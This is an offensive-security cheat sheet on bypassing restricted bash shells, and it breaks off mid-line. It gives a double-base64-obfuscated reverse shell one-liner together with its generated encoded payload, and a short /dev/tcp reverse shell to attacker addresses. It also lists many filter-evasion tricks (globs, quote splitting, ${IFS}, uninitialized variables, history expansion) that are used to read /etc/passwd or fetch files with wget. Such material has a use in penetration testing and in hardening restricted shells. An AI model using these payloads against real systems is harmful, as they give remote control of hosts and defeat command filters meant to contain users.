# Bypass Bash Restrictions

## Reverse Shell

```bash
# Double-Base64: the inner pass hides the payload, the outer pass removes the "+" and "/"
# a filter may reject (base64 of base64 text is alphanumeric plus "=" padding: every input
# byte is 7-bit and from the base64 alphabet, so no 6-bit group can ever be 62 or 63).
# The quote splitting (ba''se''6''4) and ${IFS} only defeat filters that match "base64",
# "bash" or spaces in the raw command string; they do nothing against a filter applied
# after the shell has parsed the words.
# Needs bash on the target (${IFS}, /dev/tcp) and a base64 that accepts -d (GNU coreutils).
# Run this on the attacker box (replace 10.10.14.8:4444 with your listener); it prints the
# one-liner to paste into the restricted shell.
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
# Generated payload for the address above:
#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```

### Short Rev shell

```bash
#Trick from Dikline
#Start a subshell whose stdin is the TCP socket: commands typed at the listener run on the
#victim, but their output still goes to the victim's terminal. /dev/tcp is a bash feature,
#so the shell you type this into must be bash (the inner sh can be anything).
(sh)0>/dev/tcp/10.10.10.10/443
#Then, from inside that shell, get the output back: dup the socket (fd 0) onto stdout.
#Add 2>&0 as well if you also want stderr on the listener.
exec >&0
```

## Bypass Paths and forbidden words

```bash
# Question mark binary substitution
# Globs are matched against the filesystem, so the pattern has to match exactly one file.
# A bare "nma?" only expands when the current directory contains nmap; use the absolute path.
# If nothing matches, bash passes the literal pattern through (unless nullglob/failglob is set).
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami
# Wildcard + local directory arguments
# Create a file literally named "-la"; "--" stops touch from treating it as an option.
touch -- -la
# "*" now expands to "-la" plus the other names, so ls receives -la as an argument
# without the string "-la" ever appearing in the typed command.
ls *
# [chars]
/usr/bin/n[c] # /usr/bin/nc
# Quotes / Concatenation (the shell strips the quotes/backslashes before lookup, so the
# command name is only split in the typed text, never in what is executed)
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
\u\n\a\m\e \-\a # uname -a (backslash-escaped, including the option dash)
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
/\b\i\n/////s\h # /bin/sh: escaped letters plus redundant slashes, which the kernel collapses
# Execution through $0
# $0 holds the name the current shell was started with, so it doubles as "run a shell"
# without typing bash/sh. In a login shell $0 is typically "-bash", which is not a
# runnable command, so this only works in non-login shells.
echo whoami|$0
# Uninitialized variables: an uninitialized variable expands to nothing.
# Breaks if the shell runs with set -u (nounset).
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
# Fake commands: $(u) / `u` run a non-existent command "u", which expands to an empty
# string; the "command not found" messages go to stderr but the command still runs.
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
# Concatenation of strings using history
# Only works in an interactive shell with history expansion enabled (set -H, the default
# for interactive bash); it does nothing in scripts or under bash -c.
!-1 # This will be substituted by the last command executed, and !-2 by the penultimate command
mi # This will throw an error (but is still recorded in history)
whoa # This will throw an error (but is still recorded in history)
!-1!-2 # Expands to "whoa" + "mi" and executes whoami
```

## Bypass forbidden spaces

```bash
# {form}: brace expansion inserts the space for you (bash/zsh/ksh, not POSIX sh)
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test
## IFS - Internal Field Separator. By default it is space/tab/newline, so an unquoted
## ${IFS} expansion is itself treated as a word separator. It can also be set to any
## other character ("]" in this case) so that character splits words instead of a space.
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd
# Put the command line in a variable and then execute it. $b must stay unquoted: the
# splitting on "]" happens at expansion time. Note IFS stays changed for the rest of the
# session (and wget writes into /tmp here); restore it with IFS=$' \t\n' afterwards.
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b
# Using 2 ";"
IFS=,;`cat<<